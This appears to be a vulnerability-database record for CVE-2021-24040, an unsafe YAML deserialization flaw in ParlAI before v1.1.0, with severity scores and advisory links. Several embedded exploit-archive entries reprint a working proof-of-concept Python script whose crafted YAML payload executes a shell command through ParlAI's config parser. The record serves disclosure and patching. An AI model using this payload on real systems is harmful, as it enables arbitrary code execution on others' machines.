Description
Due to use of unsafe YAML deserialization logic, an attacker with the ability to modify local YAML configuration files could provide malicious input, resulting in remote code execution or similar risks. This issue affects ParlAI prior to v1.1.0.
Affected Software
Related
{"id": "CVE-2021-24040", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24040", "description": "Due to use of unsafe YAML deserialization logic, an attacker with the ability to modify local YAML configuration files could provide malicious input, resulting in remote code execution or similar risks. This issue affects ParlAI prior to v1.1.0.", "published": "2021-09-10T22:15:00", "modified": "2021-09-24T03:06:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24040", "reporter": "cve-assign@fb.com", "references": ["https://github.com/facebookresearch/ParlAI/releases/tag/v1.1.0", "https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg", "http://packetstormsecurity.com/files/164136/Facebook-ParlAI-1.0.0-Code-Execution-Deserialization.html"], "cvelist": ["CVE-2021-24040"], "immutableFields": [], "lastseen": "2022-03-23T14:45:36", "viewCount": 63, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:50289"]}, {"type": "github", "idList": ["GHSA-MWGJ-7X7J-6966"]}, {"type": "osv", "idList": ["OSV:GHSA-MWGJ-7X7J-6966"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164136"]}, {"type": "zdt", "idList": ["1337DAY-ID-36749"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:50289"]}, {"type": "github", "idList": ["GHSA-M87F-9FVV-2MGG", "GHSA-MWGJ-7X7J-6966"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164136"]}, {"type": "zdt", "idList": ["1337DAY-ID-36749"]}]}, "exploitation": null, "vulnersScore": 5.2}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-502"], "affectedSoftware": [{"cpeName": "facebook:parlai", "version": "1.1.0", "operator": "lt", "name": "facebook parlai"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:facebook:parlai:1.1.0:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.0", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://github.com/facebookresearch/ParlAI/releases/tag/v1.1.0", "name": "https://github.com/facebookresearch/ParlAI/releases/tag/v1.1.0", "refsource": "MISC", "tags": ["Release Notes", "Third Party Advisory"]}, {"url": "https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg", "name": "https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg", "refsource": "CONFIRM", "tags": ["Patch", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/164136/Facebook-ParlAI-1.0.0-Code-Execution-Deserialization.html", "name": "http://packetstormsecurity.com/files/164136/Facebook-ParlAI-1.0.0-Code-Execution-Deserialization.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"github": [{"lastseen": "2021-12-22T11:51:52", "description": "Due to use of unsafe YAML deserialization logic, an attacker with the ability to modify local YAML configuration files could provide malicious input, resulting in remote code execution or similar risks. This issue affects ParlAI prior to v1.1.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-13T20:06:14", "type": "github", "title": "Deserialization of Untrusted Data in ParlAI", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24040"], "modified": "2021-09-15T18:26:36", "id": "GHSA-MWGJ-7X7J-6966", "href": "https://github.com/advisories/GHSA-mwgj-7x7j-6966", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-09-14T16:08:30", "description": "", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "packetstorm", "title": "Facebook ParlAI 1.0.0 Code Execution / Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24040"], "modified": "2021-09-14T00:00:00", "id": "PACKETSTORM:164136", "href": "https://packetstormsecurity.com/files/164136/Facebook-ParlAI-1.0.0-Code-Execution-Deserialization.html", "sourceData": "`# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai \n# Date: 2021-09-11 \n# Exploit Author: Abhiram V \n# Vendor Homepage: https://parl.ai/ \n# Software Link: https://github.com/facebookresearch/ParlAI \n# Version: < 1.1.0 \n# Tested on: Linux \n# CVE: CVE-2021-24040 \n# References : \n# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg \n# | https://anon-artist.github.io/blogs/blog3.html | \n \n############################################################################ \n \nIntroduction \nParlAI (pronounced \u201cpar-lay\u201d) is a free, open-source python framework for \nsharing, training and evaluating AI models on a variety of openly available \ndialogue datasets. \n \n############################################################################ \n \nVulnerability details \n \n############################################################################ \n \nDescription \nParlAI was vulnerable to YAML deserialization attack caused by unsafe \nloading which leads to Arbitrary Code Execution. \n \nProof of Concept \n \nCreate the following PoC file (exploit.py) \n \nimport os \n#os.system('pip3 install parlai') \nfrom parlai.chat_service.utils import config \nexploit = \"\"\"!!python/object/new:type \nargs: [\"z\", !!python/tuple [], {\"extend\": !!python/name:exec }] \nlistitems: \"__import__('os').system('xcalc')\" \n\"\"\" \nopen('config.yml','w+').write(exploit) \nconfig.parse_configuration_file('config.yml') \n \nExecute the python script ie, python3 exploit.py \n \nImpact \nCode Execution \n \n############################################################################ \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164136/facebookparlai1000-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "osv": [{"lastseen": "2022-06-10T05:00:35", "description": "Due to use of unsafe YAML deserialization logic, an attacker with the ability to modify local YAML configuration files could provide malicious input, resulting in remote code execution or similar risks. This issue affects ParlAI prior to v1.1.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T20:06:14", "type": "osv", "title": "Deserialization of Untrusted Data in ParlAI", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24040"], "modified": "2022-06-10T02:15:12", "id": "OSV:GHSA-MWGJ-7X7J-6966", "href": "https://osv.dev/vulnerability/GHSA-mwgj-7x7j-6966", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-11T21:40:35", "description": "Due to use of unsafe YAML deserialization logic, an attacker with the ability to modify local YAML configuration files could provide malicious input, resulting in remote code execution or similar risks. This issue affects ParlAI prior to v1.1.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-10T22:15:00", "type": "osv", "title": "PYSEC-2021-330", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24040"], "modified": "2021-09-23T00:11:05", "id": "OSV:PYSEC-2021-330", "href": "https://osv.dev/vulnerability/PYSEC-2021-330", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-22T21:24:39", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-13T00:00:00", "type": "zdt", "title": "Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24040"], "modified": "2021-09-13T00:00:00", "id": "1337DAY-ID-36749", "href": "https://0day.today/exploit/description/36749", "sourceData": "# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai\n# Exploit Author: Abhiram V\n# Vendor Homepage: https://parl.ai/\n# Software Link: https://github.com/facebookresearch/ParlAI\n# Version: < 1.1.0\n# Tested on: Linux\n# CVE: CVE-2021-24040\n# References : \n# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg\n# | https://anon-artist.github.io/blogs/blog3.html |\n\n############################################################################\n\nIntroduction\nParlAI (pronounced \u201cpar-lay\u201d) is a free, open-source python framework for\nsharing, training and evaluating AI models on a variety of openly available\ndialogue datasets.\n\n############################################################################\n\nVulnerability details\n\n############################################################################\n\nDescription\nParlAI was vulnerable to YAML deserialization attack caused by unsafe\nloading which leads to Arbitrary Code Execution.\n\nProof of Concept\n\nCreate the following PoC file (exploit.py)\n\nimport os\n#os.system('pip3 install parlai')\nfrom parlai.chat_service.utils import config\nexploit = \"\"\"!!python/object/new:type\n args: [\"z\", !!python/tuple [], {\"extend\": !!python/name:exec }]\n listitems: \"__import__('os').system('xcalc')\"\n\"\"\"\nopen('config.yml','w+').write(exploit)\nconfig.parse_configuration_file('config.yml')\n\nExecute the python script ie, python3 exploit.py\n\nImpact\nCode Execution\n\n############################################################################\n", "sourceHref": "https://0day.today/exploit/36749", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-13T17:35:40", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T00:00:00", "type": "exploitdb", "title": "Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-24040", "CVE-2021-24040"], "modified": "2021-09-13T00:00:00", "id": "EDB-ID:50289", "href": "https://www.exploit-db.com/exploits/50289", "sourceData": "# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai\r\n# Date: 2021-09-11\r\n# Exploit Author: Abhiram V\r\n# Vendor Homepage: https://parl.ai/\r\n# Software Link: https://github.com/facebookresearch/ParlAI\r\n# Version: < 1.1.0\r\n# Tested on: Linux\r\n# CVE: CVE-2021-24040\r\n# References : \r\n# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg\r\n# | https://anon-artist.github.io/blogs/blog3.html |\r\n\r\n############################################################################\r\n\r\nIntroduction\r\nParlAI (pronounced \u201cpar-lay\u201d) is a free, open-source python framework for\r\nsharing, training and evaluating AI models on a variety of openly available\r\ndialogue datasets.\r\n\r\n############################################################################\r\n\r\nVulnerability details\r\n\r\n############################################################################\r\n\r\nDescription\r\nParlAI was vulnerable to YAML deserialization attack caused by unsafe\r\nloading which leads to Arbitrary Code Execution.\r\n\r\nProof of Concept\r\n\r\nCreate the following PoC file (exploit.py)\r\n\r\nimport os\r\n#os.system('pip3 install parlai')\r\nfrom parlai.chat_service.utils import config\r\nexploit = \"\"\"!!python/object/new:type\r\n args: [\"z\", !!python/tuple [], {\"extend\": !!python/name:exec }]\r\n listitems: \"__import__('os').system('xcalc')\"\r\n\"\"\"\r\nopen('config.yml','w+').write(exploit)\r\nconfig.parse_configuration_file('config.yml')\r\n\r\nExecute the python script ie, python3 exploit.py\r\n\r\nImpact\r\nCode Execution\r\n\r\n############################################################################", "sourceHref": "https://www.exploit-db.com/download/50289", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
CVE-2021-24040
